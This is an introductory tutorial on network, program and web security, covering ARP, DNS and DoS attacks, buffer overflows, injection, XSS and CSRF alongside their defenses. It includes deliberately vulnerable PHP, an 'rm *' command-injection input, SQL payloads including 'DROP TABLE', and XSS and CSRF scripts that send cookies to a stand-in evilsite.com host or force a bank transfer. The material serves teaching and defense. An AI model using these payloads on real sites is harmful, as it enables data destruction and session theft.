The goal of computer security is to protect assets on computer systems against attack. To defend against attackers, we need to understand how attacks are performed. This article presents some common attacks, such as DNS cache poisoning, DoS, stack overflow and XSS.
Concepts
What is security? Security properties: CIA+AAA
- Confidentiality: avoidance of the unauthorized disclosure of information
- Encryption
- Access control
- Authentication: determination of identity or role that somebody has
- Authorization: determination of whether a person is allowed to access resources, based on an access control policy
- Integrity: data has not been maliciously altered
- backup
- checksum
- data correcting code
- Availability: data/service can be accessed as desired
- computational redundancies (backup): computer or storage device that serves as fallback in the case of failures, e.g., RAID
- Authenticity: determining whether a statement issued by a person is genuine. Nonrepudiation: an authentic statement issued by a person cannot be denied.
- digital signature
- Anonymity: data source is not identifiable
- aggregation
- mixing
- proxy
- pseudonym
- Accountability: actions are traceable to those responsible
Attack types:
- Eavesdropping (confidentiality): interception of information intended for somebody else
- sniffing
- Alteration (integrity): unauthorized modification of information
- man-in-the-middle
- Denial-of-service (availability): interruption of a service
- Masquerading (authenticity): pretending to be somebody else
- phishing
- spoofing
- Repudiation (assurance): denial of a digital receipt
- Traceback (anonymity): reveal the source of information
Network Security
This section covers the basics of networking and then presents some well-known attacks.
TCP/IP model
Network communication is characterized by 3 fundamental principles:
- packet switching
- data split into packets
- packets transported independently and handled with best effort
- may be dropped
- stack of layers
- higher layers use the services of lower layers
- TCP/IP protocol suite (low->high): physical, data link, network, transport, application
- encapsulation
- control information (a header, plus an optional footer) + data (the payload)
- a packet from a higher layer becomes the payload of a packet in the next lower layer
Link layer
Ethernet
Ethernet refers to both the physical media used and the link layer protocol standardized as IEEE802.3.
Each network device, or more precisely each network interface, is identified by a 48-bit MAC (Media Access Control) address whose first 3 octets are the organization identifier.
Hubs and switches both connect multiple devices on a LAN; a hub simply repeats signals at the physical layer, whereas a switch operates at the link layer.
Hub: each frame received is duplicated and broadcast to all the machines connected on the same network segment. A random wait strategy is used to resolve collisions. Problems: a large amount of unnecessary traffic and exposure to eavesdropping.
Switch: learns the MAC addresses of the machines connected to each of its ports/interfaces and forwards each frame only to the destination device (broadcasting it if the destination MAC address is unknown).
ARP
Address Resolution Protocol (ARP): a link layer protocol that determines the MAC address associated with a given IP address.
How does ARP work?
The source machine needs to know the MAC address of the destination machine.
- It broadcasts an ARP request to all network interfaces on the LAN: "Who has IP address 192.168.1.105? Tell IP address 192.168.1.102."
- The machine with the IP address 192.168.1.105 responds with an ARP reply to the source machine: "192.168.1.105 is at 00:16:B7:29:E4:7D"
- When the source machine receives the ARP reply, it stores the IP-MAC address pair for some time in a table called the ARP cache.
- After this resolution, the source can finally send its data to the destination.
What's wrong with ARP?
- The ARP cache is updated whenever an ARP response is received
- ARP announcements are not authenticated
What is ARP spoofing/ARP cache poisoning?
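The attacker sends forged ARP replies that map the gateway's IP address to the attacker's MAC address. The attacker thereby pretends to be the gateway and becomes a man-in-the-middle between the target and the gateway. This kind of attack enables eavesdropping, such as sniffing passwords, or even tampering with the traffic.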
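The two weaknesses listed above can be illustrated with a toy model. This is only a sketch of the idea, not a network implementation: the `ArpCache` class and all addresses are made up for illustration.

```python
class ArpCache:
    """Toy ARP cache that, like classic ARP, trusts every reply it sees."""

    def __init__(self):
        self.table = {}  # IP address -> MAC address

    def on_reply(self, ip, mac):
        # No authentication: the latest reply simply overwrites the entry.
        self.table[ip] = mac

    def lookup(self, ip):
        return self.table.get(ip)


# Hypothetical addresses, chosen only for this illustration.
GATEWAY_IP = "192.168.1.1"
GATEWAY_MAC = "AA:AA:AA:AA:AA:AA"
ATTACKER_MAC = "DE:AD:BE:EF:00:01"

cache = ArpCache()
cache.on_reply(GATEWAY_IP, GATEWAY_MAC)    # legitimate reply
cache.on_reply(GATEWAY_IP, ATTACKER_MAC)   # forged reply from the attacker
print(cache.lookup(GATEWAY_IP))            # frames for the gateway now go to the attacker
```

A static ARP table corresponds to a cache whose `on_reply` refuses to overwrite existing entries.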
How to defend?
- static ARP table: inconvenient
- software that inspects ARP packets and detects spoofing
Network layer
IP
The Internet Protocol (IP) is a network layer protocol that makes a best-effort attempt to route data packets from a source node to a destination node in the Internet. A node is identified by an IP address (32-bit in IPv4, 128-bit in IPv6). IPv4 addresses were originally divided into classes according to their leading bits:
| Class | Leading bits | Default subnet mask in dot-decimal notation |
|-----------------------|--------------|---------------------------------------------|
| Class A | 0 | 255.0.0.0 |
| Class B | 10 | 255.255.0.0 |
| Class C | 110 | 255.255.255.0 |
| Class D (multicast) | 1110 | not defined |
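As a small illustration of the table, the class of an IPv4 address can be read off the leading bits of its first octet. The function name `ipv4_class` is an assumption made for this sketch.

```python
import ipaddress


def ipv4_class(address: str) -> str:
    """Return the classful category (A-D, or 'other') from the leading bits."""
    first_octet = int(ipaddress.IPv4Address(address)) >> 24
    if first_octet >> 7 == 0b0:
        return "A"
    if first_octet >> 6 == 0b10:
        return "B"
    if first_octet >> 5 == 0b110:
        return "C"
    if first_octet >> 4 == 0b1110:
        return "D"
    return "other"


print(ipv4_class("192.168.1.105"))
```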
How does IP packet routing work?
Any host employs a simple algorithm for routing outbound packets:
- if the destination IP address is in the same LAN, the packet is transmitted directly to the destination machine
- otherwise, the packet is transmitted to the gateway, which handles the next step of the routing
Gateway/router: given the destination IP address, it either delivers the packet to the destination machine in one of its LANs or forwards it to a neighboring router according to a routing table. The TTL field in the IP packet is decremented at each hop and the packet is discarded when it reaches zero, so packets cannot circulate forever in a routing loop. The Internet is partitioned into clusters called autonomous systems (AS). Routing within an AS is done using shortest paths (OSPF), whereas routing between ASs is determined by contractual agreements (BGP).
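The host-side routing decision described above can be sketched with Python's standard `ipaddress` module. The function name `next_hop` and the gateway address are assumptions; the other addresses reuse the ARP example.

```python
import ipaddress


def next_hop(src_interface: str, dst: str, gateway: str) -> str:
    """Return the IP address the packet is handed to on the local link."""
    iface = ipaddress.ip_interface(src_interface)   # e.g. "192.168.1.102/24"
    if ipaddress.ip_address(dst) in iface.network:
        return dst        # same LAN: deliver directly to the destination
    return gateway        # different network: hand the packet to the gateway


print(next_hop("192.168.1.102/24", "192.168.1.105", "192.168.1.1"))
print(next_hop("192.168.1.102/24", "129.215.160.240", "192.168.1.1"))
```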
Attacks on IP:
- IP spoofing: the attacker specifies a desired source address other than the sender's real IP address in the IP packet. Defenses:
- block/filter spoofed packets in border routers
- block the attacker machine using IP traceback techniques
- IP sniffing: setting a network interface to promiscuous mode allows an attacker to capture/eavesdrop all data transmitted over a particular network segment (such as a network connected by a hub in the center). Defenses:
- use switches as opposed to hubs
- use encryption in higher-level protocols
ICMP
Internet Control Message Protocol is used for network diagnosis, such as testing if a host is alive (e.g., ping) or finding the path to a target host (traceroute).
4 common message types:
- echo request
- echo reply
- time exceeded
- destination unreachable
Transport layer
- TCP
- connection oriented
- reliable stream of ordered bytes using sequence number and acknowledgement number
- flow control by sliding window
- congestion control by automatically adjusting congestion window size as network condition changes
- UDP
- connectionless or stateless
- unreliable, best-effort: no guarantee about the correctness or order; checking for missing packets is left to applications processing these packets
- much faster: suitable for time sensitive applications where communication speed is more important than completeness
Both TCP and UDP support concurrent applications on the same host by using 16-bit port numbers, of which 0-1023 are reserved for well-known protocols.
- TCP session hijacking: hijack or alter an existing TCP session. Step 1: learn the sequence numbers by packet sniffing. Step 2: inject a packet using a spoofed source IP address. Countermeasure: encryption
- Denial-of-service (DoS): exceed the maximum capacity (e.g., bandwidth) of a server so that it can no longer function properly
- Ping flood: a powerful machine sends a massive number of ICMP echo requests to a single victim server, which is overwhelmed by the traffic and starts to drop legitimate connections
- Smurf attack: an amplified variant of the ping flood. The attacker sends an ICMP echo request with the source address set to the target and the destination address set to the broadcast address of a network (the amplifier), so that every node on that network replies to the target. Countermeasures:
- routers should be configured to ignore broadcast requests
- a server can be configured to ignore ping requests
- SYN flood: an attacker sends a large number of SYN packets (usually with spoofed source addresses) to the victim server, ignores the SYN/ACK replies, and never sends the expected ACK packets. The victim machine's backlog queue fills up and legitimate TCP connection requests are blocked. Countermeasures:
- SYN cookies
- do not allocate resources to half-open connections
- Optimistic TCP ACK attack: the attacker acknowledges segments that are still in flight (sends ACKs before receiving the data) so that the server increases its sending rate. Countermeasure: set a maximum traffic limit per client
- Distributed DoS (DDoS): control a large number of machines (a botnet) to direct traffic at a single server. Countermeasures:
- IP traceback: determining the origin of a packet without relying on the source address field (because it is spoofed). E.g., reconstruct the path to the attacker by node sampling (the packet is marked by some router on the path).
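The idea behind SYN cookies, mentioned in the list above, is that the server derives its initial sequence number from the connection parameters instead of storing state for each half-open connection. The following is a simplified sketch under stated assumptions: real implementations also encode the MSS and a coarse timestamp into the cookie, and the secret, the field layout and the function names here are invented for illustration.

```python
import hashlib
import hmac

SECRET = b"server-side secret"   # hypothetical key, known only to the server


def syn_cookie(src_ip, src_port, dst_ip, dst_port, client_isn, time_slot):
    """Derive a 32-bit initial sequence number from the connection parameters."""
    msg = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}|{client_isn}|{time_slot}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:4], "big")


def ack_is_valid(ack_number, src_ip, src_port, dst_ip, dst_port, client_isn, time_slot):
    """The final ACK must acknowledge cookie + 1; nothing was stored after the SYN."""
    cookie = syn_cookie(src_ip, src_port, dst_ip, dst_port, client_isn, time_slot)
    return ack_number == (cookie + 1) % 2**32


conn = ("10.0.0.5", 40000, "10.0.0.1", 80, 12345, 7)   # made-up connection values
cookie = syn_cookie(*conn)
print(ack_is_valid((cookie + 1) % 2**32, *conn))
```

Because the server recomputes the cookie when the ACK arrives, a flood of SYN packets from spoofed addresses consumes no entries in the backlog queue.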
Application layer
This section will focus on the most commonly used application protocols: DNS and HTTPS.
DNS
A URL describes the location and access method of a resource on the Internet.
URL:
<scheme>://<user>:<password>@<host>:<port>/<url-path>?<query-string>
The host is also called the domain name:
<subdomain>.<domain>.<topdomain>
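To make the URL components concrete, Python's standard `urllib.parse` module can split a URL into the parts named above. The user name, password and port in this URL are invented for the example.

```python
from urllib.parse import parse_qs, urlsplit

parts = urlsplit("http://alice:secret@www.example.com:8080/content.php?domain=google.com")

print(parts.scheme)                     # scheme
print(parts.username, parts.password)   # user and password
print(parts.hostname, parts.port)       # host and port
print(parts.path)                       # url-path
print(parse_qs(parts.query))            # query-string as a dictionary
```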
DNS maps domain names to their corresponding IP addresses (a many-to-many mapping) using distributed databases on name servers that are organized hierarchically.
Each name server stores a collection of records. Main record types include:
- A record: host name -> IP address
- NS record: domain -> authoritative server
- Glue record (breaks circular references): an A record for a name server referred to in an NS record. Example:
inf.ed.ac.uk. NS dns0.inf.ed.ac.uk.
dns0.inf.ed.ac.uk. A 129.215.160.240 [glue record]
Name resolution:
- Iterative resolution: name server refers client to authoritative server via NS record
- Recursive resolution: name server queries other name servers and forwards the final answer to client
Query mechanism:
- issued over port 53
- a 16-bit request identifier matches each answer with its query
- responses are not sufficiently authenticated
Pharming and phishing
Pharming: an attacker causes requests for websites to resolve to false IP addresses that belong to malicious servers.
Phishing: the victim is directed to a website that appears identical to the requested site but is designed with malicious intent, such as stealing passwords.
DNS cache poisoning
Clients/resolvers (OS or application) and lower-level name servers cache the records returned by earlier queries.
Why caching?
- reduce DNS traffic. The root servers and TLD servers will be overloaded without DNS caching.
- more efficient with caching
DNS cache poisoning tricks a name server into caching a fake DNS record. Any clients of the name server issuing DNS requests for the poisoned domain will be redirected to the attacker's IP address.
A DNS server may be vulnerable to DNS cache poisoning because it:
- disregards identifiers or uses predictable identifiers
- does not respond to queries for a nonexistent subdomain
Subdomain DNS Cache poisoning:
- The attacker causes the victim (either a DNS server or a client) to send many DNS requests for nonexistent subdomains of the target domain
- The attacker sends the victim forged DNS responses containing:
- a correct NS record
- a spoofed glue record pointing to the attacker's IP
Defense:
- use a random identifier combined with a random source port
- use signed records (DNSSEC: signing all DNS replies with public key cryptography)
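The first defense can be sketched as follows: a forged response is accepted only if it matches both the identifier and the source port of a pending query, which enlarges the space a blind attacker has to guess from. The function names and the choice of port range (1024 to 65535) are assumptions made for this illustration.

```python
import secrets


def new_query():
    """Pick an unpredictable 16-bit ID and a random source port for a query."""
    query_id = secrets.randbelow(2**16)
    source_port = 1024 + secrets.randbelow(2**16 - 1024)
    return query_id, source_port


def accept_response(pending, response_id, response_port):
    """Accept a response only if both the ID and the port match the pending query."""
    return pending == (response_id, response_port)


# Number of (ID, port) combinations, compared with 2**16 for the ID alone.
GUESS_SPACE = 2**16 * (2**16 - 1024)

pending = new_query()
print(accept_response(pending, *pending))
print(GUESS_SPACE)
```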
HTTPS
HTTPS = HTTP + TLS
TLS is an intermediate layer between the transport and application layers that handles encryption, integrity and authentication.
| | Confidentiality | Integrity | Authentication |
|---|---|---|---|
| Setup | public-key based key exchange (RSA or DH) | public-key digital signature (RSA) | |
| Data transmission | symmetric encryption (AES in CBC mode) | hash-based MAC (SHA256) | |
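The hash-based MAC entry in the table can be illustrated with Python's standard `hmac` module. This is a minimal sketch of the integrity check only, not of how a TLS library structures its records; the key and message are placeholders.

```python
import hashlib
import hmac
import os

key = os.urandom(32)                  # stands in for the MAC key agreed during setup
message = b"GET /account HTTP/1.1"    # hypothetical application data

tag = hmac.new(key, message, hashlib.sha256).digest()


def verify(key, message, tag):
    """Recompute the MAC and compare it in constant time."""
    expected = hmac.new(key, message, hashlib.sha256).digest()
    return hmac.compare_digest(expected, tag)


print(verify(key, message, tag))                    # unmodified message
print(verify(key, b"GET /admin HTTP/1.1", tag))     # altered message
```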
Authenticity of the server is established by certificates, which form a chain of trust. A certificate includes at least the following information:
- issuer: CA that issues the certificate
- subject: organization owning the website
- domain name
- expiration date
- cryptographic ciphers
- public key
- signature
No efficient general way to break HTTPS is known, although specific attacks exist, such as Logjam, aimed at signed DH key exchange, and padding attacks aimed at RSA.
Firewalls and IDS
A firewall, usually deployed in a router, is designed to prevent unauthorized access to a private network based on a predefined set of rules.
Each rule can specify
- protocol
- source or destination IP:port
- other properties of the packet, such as SYN flag in a TCP packet
- action
- accept
- reject (inform the source that the packet was rejected)
- drop (no indication of failure)
The set of rules can act as a blacklist (accept by default, block what is listed) or a whitelist (block by default, accept what is listed).
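A stateless rule set of this kind can be sketched as a first-match filter. The `Rule` class, the dictionary representation of a packet and the example ports are assumptions chosen for illustration.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Rule:
    action: str                      # "accept", "reject" or "drop"
    protocol: Optional[str] = None   # None matches any protocol
    dst_port: Optional[int] = None   # None matches any destination port

    def matches(self, packet: dict) -> bool:
        return (self.protocol in (None, packet["protocol"])
                and self.dst_port in (None, packet["dst_port"]))


def filter_packet(rules, packet, default="drop"):
    """The first matching rule decides; otherwise the default action applies."""
    for rule in rules:
        if rule.matches(packet):
            return rule.action
    return default


# Whitelist policy: only HTTPS and DNS are accepted, everything else is dropped.
WHITELIST = [Rule("accept", "tcp", 443), Rule("accept", "udp", 53)]

print(filter_packet(WHITELIST, {"protocol": "tcp", "dst_port": 443}))
print(filter_packet(WHITELIST, {"protocol": "tcp", "dst_port": 23}))
```

A blacklist uses the same function with `default="accept"` and rules whose action is `reject` or `drop`.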
Firewall types include
- stateless (packet filter): treats each packet in isolation, without considering other packets
- stateful: maintains records of the active connections passing through it and can determine whether a packet starts a new connection or belongs to an existing one. For example, it can allow only those inbound packets that are responses to a connection initiated from within a trusted internal network
- application layer firewall: acts as a protective MitM that "understands" certain application protocols and inspects the contents of packets (i.e., the application layer data), which allows an admin to block inappropriate traffic
An IDS (Intrusion Detection System) detects a potential incident/attack in progress, whereas firewalls are preventative. If an IDS detects an intrusion such as port scanning or DoS, it raises an alarm so that the admin can react to a possible attack.
Most IDSs incorporate the two methods below:
- Rule based intrusion detection
- uses rules to identify actions that match known intrusion attacks
- requires the admin to anticipate attack patterns in advance
- cannot detect new types of attack
- low false positive rate
- Statistical intrusion detection
- dynamically builds a statistical model of acceptable or normal traffic and raises an alarm on anything that does not match (an abnormal traffic pattern is taken to indicate malicious behavior)
- the admin does not need to anticipate potential attacks
- can detect new types of attack
- high false positive rate
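Statistical detection can be illustrated with a very simple model that flags traffic far from the observed mean. The metric (requests per minute), the sample values and the threshold are assumptions for this sketch; real systems use much richer models.

```python
import statistics


def is_anomalous(baseline, observation, threshold=3.0):
    """Flag an observation more than `threshold` standard deviations from the mean."""
    mean = statistics.mean(baseline)
    stdev = statistics.stdev(baseline)
    if stdev == 0:
        return observation != mean
    return abs(observation - mean) / stdev > threshold


# Hypothetical requests-per-minute counts recorded during normal operation.
normal_traffic = [98, 102, 100, 97, 103, 101, 99, 100]

print(is_anomalous(normal_traffic, 104))    # within the normal range
print(is_anomalous(normal_traffic, 5000))   # far outside the normal range
```

Lowering the threshold catches more attacks but also raises more false alarms, which is the trade-off noted in the list above.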
Application program Security
Buffer overflow
Stack Overflow
void function(int a, int b, int c) {
    char buffer1[5];   /* local variable, stored in this call's stack frame */
}
int main(void) {
    function(1, 2, 3);
    return 0;
}
The stack consists of frames. Each is associated with an active function call.
- calling function
- push arguments onto the stack (in reverse order)
- push return address (the address of instruction to run after the current call terminates) onto the stack
- jump to the function's address
- called function
- push the old stack frame pointer (%ebp) onto the stack
- set the stack frame pointer (%ebp) to where the end of the stack is right now (%esp)
- push local variables onto the stack
- returning
- restore the previous stack frame: %esp = %ebp, %ebp = (%esp)
- jump back to the return address: %eip = 4(%esp)
A stack overflow attack attempts to change the flow of execution by overwriting the return address so that it points to malicious code loaded onto the stack or to known library functions. It occurs when the program blindly copies user input into a buffer that is smaller than the input and, as a result, overwrites the memory adjacent to the buffer, including other local variables, the saved frame pointer and the return address.
Challenges for this attack
- the injected code must consist of machine instructions and cannot contain any 0x00 byte, which would terminate a string copy
- find the address of the return pointer on the stack relative to the current buffer
- find the address of the injected code. NOP sled: pad the area before the malicious code with NOPs so that a jump landing anywhere in the padding slides into the code
Defenses
- avoid unsafe functions that do not check the bounds of the buffers they manipulate; use their safer counterparts instead, e.g., replace strcpy with strlcpy
- stack canary
- place a small random integer right before the return pointer; a copy of the value is stored somewhere else
- to overwrite the return pointer the canary must also be overwritten
- the canary is checked to make sure it has not changed before the function returns
- make the stack and heap non-executable: even if the canary is bypassed, the injected code cannot be executed. Still vulnerable to return-to-libc attacks.
- address space layout randomization: place standard libraries at random locations in memory. Therefore, for each program, exec() is situated at a different location
- safe programming: whenever a program copies user-supplied input into a buffer, ensure that it does not copy more data than the buffer can hold
Arithmetic overflow
Integer overflow:
An integer overflow occurs when a program attempts to store a value in an integer that is greater than the maximum value the integer can hold.
The representation of integers in a 32-bit architecture:
- unsigned integers: 0x00000000 - 0xffffffff
- signed integers (the most significant bit is 0 for non-negative numbers and 1 for negative numbers) use two's complement notation
- positive numbers: N is stored as N, e.g., 1=0x00000001
- negative numbers: -N is stored as 2^32-N, e.g., -1=0xffffffff
An example of arithmetic overflow is shown below; it prints num + 1 = 0x0:
#include <stdio.h>
int main(void) {
    unsigned int num = 0xffffffff;
    printf("num + 1 = 0x%x\n", num + 1);   /* wraps around to 0 */
    return 0;
}
Safe programming practice checks that a result will stay within the integer bounds before performing the arithmetic.
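Python integers do not overflow, so the 32-bit behavior described above has to be simulated with a mask. The sketch below mirrors the wraparound, the two's complement encoding and a bounds check; the function names are assumptions for this illustration.

```python
MASK32 = 0xFFFFFFFF


def add_u32(a, b):
    """Unsigned 32-bit addition with wraparound, as the hardware performs it."""
    return (a + b) & MASK32


def to_twos_complement(n, bits=32):
    """Bit pattern that stores the signed integer n in `bits` bits."""
    return n & ((1 << bits) - 1)


def checked_add_u32(a, b):
    """Add two values in 0..MASK32, refusing if the result would not fit."""
    if a > MASK32 - b:
        raise OverflowError("unsigned 32-bit overflow")
    return a + b


print(hex(add_u32(0xFFFFFFFF, 1)))     # same wraparound as the C program
print(hex(to_twos_complement(-1)))     # encoding of -1
```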
Format string
If an attacker is able to supply the format string that controls the behavior of a format function, they can read stack memory and even write to memory:
printf("%08x.%08x.%08x.%08x.%08x|%s|");   // no arguments supplied: prints values found on the stack
printf("hello %n", &temp);   // writes 6 into temp: %n stores the number of characters printed so far
To prevent this attack, programmers should always supply the format string themselves and pass user input only as an argument:
printf("%s", argv[1]);
Password based Authentication
Password cracking attacks:
- brute force: try all k^l candidate passwords of length l over an alphabet of k characters
- dictionary attack: try
- common passwords
- English words
- combination of notable dates and names
- etc
- rainbow table: precomputed table for reversing hash functions
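The k^l figure for brute force grows quickly with both the alphabet size and the length, as a short calculation shows. The function name `search_space` is an assumption for this sketch.

```python
def search_space(alphabet_size: int, length: int) -> int:
    """Number of candidate passwords of exactly `length` characters (k^l)."""
    return alphabet_size ** length


print(search_space(26, 8))   # 8 lowercase letters
print(search_space(62, 8))   # 8 letters (both cases) or digits
```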
How should passwords be stored? As the hash of the password together with a random salt: hash(pwd||salt)
Advantage: this protects against frequency analysis and precomputed table attacks, because every password has a different random salt, so even identical passwords have different hash values.
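The hash(pwd||salt) scheme can be sketched with Python's standard library. SHA-256 is used here only to mirror the formula above; the function names are assumptions, and deployed systems usually prefer a deliberately slow function such as `hashlib.pbkdf2_hmac`.

```python
import hashlib
import hmac
import os


def hash_password(password: str, salt: bytes = None):
    """Return (salt, digest) where digest = SHA-256(password || salt)."""
    if salt is None:
        salt = os.urandom(16)   # fresh random salt for every stored password
    digest = hashlib.sha256(password.encode("utf-8") + salt).digest()
    return salt, digest


def verify_password(password: str, salt: bytes, stored_digest: bytes) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, stored_digest)


salt_a, digest_a = hash_password("hunter2")
salt_b, digest_b = hash_password("hunter2")
print(digest_a != digest_b)   # identical passwords, different stored hashes
```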
Web Security
This section covers 2 types of attack in the web world: injection on the server side and session hijacking on the client side.
Injection
An injection attack occurs when untrusted input is used as part of a command or query, resulting in the execution of unintended commands or in unauthorized access to or manipulation of data.
Command injection
Example
Consider a service that prints the result of the command whois. An example URL is http://www.example.com/content.php?domain=google.com and the implementation of content.php might be:
<?php
if ($_GET['domain']) {
    echo system('whois ' . $_GET['domain']);
}
?>
The input www.example.com; rm * results in the following PHP call, which runs rm * after whois:
echo system('whois www.example.com; rm *');
Defense
- escape input: the input string is then treated as a single argument
- follow the principle of least privilege: the web server should run with the most restrictive permissions possible (read, write and execute permissions only on the files it needs)
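The first defense can be sketched in Python, used here instead of the PHP of the example. Either no shell is involved at all, or the untrusted part is quoted with the standard `shlex.quote` function. The helper names are assumptions for this illustration.

```python
import shlex


def build_whois_argv(domain: str):
    """Argument list for subprocess.run(argv): no shell ever parses `domain`."""
    return ["whois", domain]


def build_whois_shell_command(domain: str) -> str:
    """If a shell command string is unavoidable, quote the untrusted part."""
    return "whois " + shlex.quote(domain)


malicious = "www.example.com; rm *"
print(build_whois_argv(malicious))            # the whole input is one argument
print(build_whois_shell_command(malicious))   # the ; is no longer a command separator
```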
SQL injection
Example
A web server logs a user in if a row with the given username and password exists.
<?php
$conn = pg_pconnect("dbname=user_accounts");
$result = pg_query($conn, "SELECT * FROM user_accounts
    WHERE username = '" . $_GET['user'] . "' AND password = '" . $_GET['pwd'] . "';");
if (pg_num_rows($result) > 0) {
    echo "Success";
    user_control_panel_redirect();
}
An attacker can log in as admin (bypassing authentication) via the URL http://www.example.com/login.php?user=admin'--&pwd=f because -- starts a comment in PostgreSQL, so the password check is ignored:
<?php
pg_query($conn,
"SELECT * FROM user_accounts
WHERE username = 'admin'-- ' AND password = 'f';");
The attacker can even delete the table via http://www.example.com/login.php?user=admin';DROP TABLE user_accounts;--&pwd=f
<?php
pg_query($conn,
"SELECT * FROM user_accounts WHERE username = 'admin'; DROP TABLE user_accounts;-- ' AND password = 'f';");
Defense
- sanitize user input, i.e., escape special characters
- prepared statements: untrusted input is not interpreted as a command
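The difference between string concatenation and a parameterized query can be shown with Python's built-in `sqlite3` module, used here in place of PostgreSQL so that the sketch is self-contained. The table contents and function names are invented, and the password is stored in plain text only to keep the example short.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE user_accounts (username TEXT, password TEXT)")
conn.execute("INSERT INTO user_accounts VALUES ('admin', 's3cret')")


def login_unsafe(user, pwd):
    # Vulnerable: the input is concatenated into the SQL text.
    query = ("SELECT * FROM user_accounts WHERE username = '" + user +
             "' AND password = '" + pwd + "'")
    return conn.execute(query).fetchone() is not None


def login_safe(user, pwd):
    # Placeholders keep the input as data; it is never parsed as SQL.
    query = "SELECT * FROM user_accounts WHERE username = ? AND password = ?"
    return conn.execute(query, (user, pwd)).fetchone() is not None


print(login_unsafe("admin'--", "f"))   # the comment removes the password check
print(login_safe("admin'--", "f"))     # treated as a literal, non-existent username
```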
Session hijacking
Two main approaches to maintaining a session (to remember a user or a shopping cart):
- hidden field: every HTML page sent to the client includes a form with a hidden field containing a unique session ID, and this field is sent back to the server in subsequent requests
<input type="hidden" name="sessionid" value="12345">
- cookie: a key-value pair with additional attributes, sent by the server to a browser, which automatically includes the cookie in all subsequent requests to the origin domain
Sessions can be hijacked in 2 different ways:
- XSS (Session token theft)
- CSRF
XSS
Cross-Site Scripting (XSS): improper validation of input allows malicious code to be injected into a vulnerable site and executed in a victim's browser.
There are two categories of XSS attack:
1. Stored XSS attack: the malicious script is stored on the vulnerable site, e.g., in its database
Consider a guestbook where users can leave comments:
<html>
<title>Sign My Guestbook!</title>
<body>
Sign my guestbook!
<form action="sign.php" method="POST">
<input type="text" name="name">
<input type="text" name="message" size="40">
<input type="submit" value="Submit">
</form>
</body>
</html>
An attacker submits the following as the message:
<script>alert("XSS injection!");</script>
The guestbook page served to every visitor then contains the script:
<html>
<title>My Guestbook</title>
<body>
Your comments are greatly appreciated!<br />
Here is what everyone said:<br />
Evilguy: <script>alert("XSS injection!");</script> <br />
Joe: Hi! <br />
John: Hello, how are you? <br />
Jane: How does the guestbook work? <br />
</body>
</html>
The script above is harmless, but a similar script can steal a user's session ID:
<script>
var img = new Image();
img.src = "http://www.evilsite.com/steal.php?cookie=" + document.cookie;
</script>
2. Reflected XSS attack: the malicious script is sent by the victim as part of a request and then reflected off the vulnerable site
Consider a search page that echoes the search query: the results page of http://victimsite.com/search.php?query=security might contain the line: Search results for security
An attacker can construct a malicious query like this:
http://victimsite.com/search.php?query=<script>document.location='http://evilsite.com/steal.php?cookie='+document.cookie</script>
When the victim clicks this link, the victim's cookies for the vulnerable site are sent to the attacker's site.
Defense
The root cause is on the server side: failure to sanitize input provided by a user.
- Escape special characters such as <, >, ", & in user input before rendering it into HTML
- Input validation: check that inputs are of the expected form
- HttpOnly flag on cookies: when set, JavaScript cannot access or manipulate the cookie
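Escaping can be sketched with Python's standard `html.escape` function, applied here to the guestbook entry from the stored XSS example. The `render_comment` helper is an assumption for this illustration.

```python
import html


def render_comment(name: str, message: str) -> str:
    """Escape user-supplied fields before placing them into the page."""
    return f"{html.escape(name)}: {html.escape(message)} <br />"


print(render_comment("Evilguy", '<script>alert("XSS injection!");</script>'))
```

The browser then displays the script as text instead of executing it.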
CSRF
Cross-Site Request Forgery: a malicious website causes a victim to unknowingly execute commands on a vulnerable website to which the victim is currently authenticated.
Example
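Suppose an innocent user handles banking online at www.banking.com. This user may stumble onto a site www.evilsite.com that contains the malicious JavaScript code below:
<script>
document.location="http://www.banking.com/transferFunds.php?amount=10000&fromID=1234&toID=5678";
</script>
If the user is still logged in to www.banking.com, the browser attaches the session cookie to this request, so the bank processes the transfer as if the user had issued it.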
Defense
- Check the Referer header, which indicates the page from which the request was issued. Problems: some browsers omit the header for privacy reasons, and it may be spoofed by an attacker.
- Combine the cookie with a CSRF token to authenticate requests: an unpredictable session/CSRF token is included in a hidden field of the HTML page in every HTTP response and is passed back via the URL or POST data in every HTTP request. The server checks the validity of both the cookie and the CSRF token. Using a different token in each server response is recommended to prevent replay attacks.
- Log out frequently
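The token-based defense can be sketched as follows. The in-memory store, the function names and the single-use policy are assumptions for this illustration; a web framework would normally provide this mechanism.

```python
import hmac
import secrets

csrf_tokens = {}   # session ID -> token currently expected (hypothetical store)


def issue_token(session_id: str) -> str:
    """Create a fresh unpredictable token to embed in a hidden form field."""
    token = secrets.token_urlsafe(32)
    csrf_tokens[session_id] = token
    return token


def check_request(session_id: str, submitted_token: str) -> bool:
    """Accept the request only if the token matches; each token is single-use."""
    expected = csrf_tokens.pop(session_id, None)
    return expected is not None and hmac.compare_digest(expected, submitted_token)


token = issue_token("12345")
print(check_request("12345", token))   # legitimate form submission
print(check_request("12345", token))   # replay of the same token
```

A request forged by www.evilsite.com carries the victim's cookie but not the token, so it fails the check.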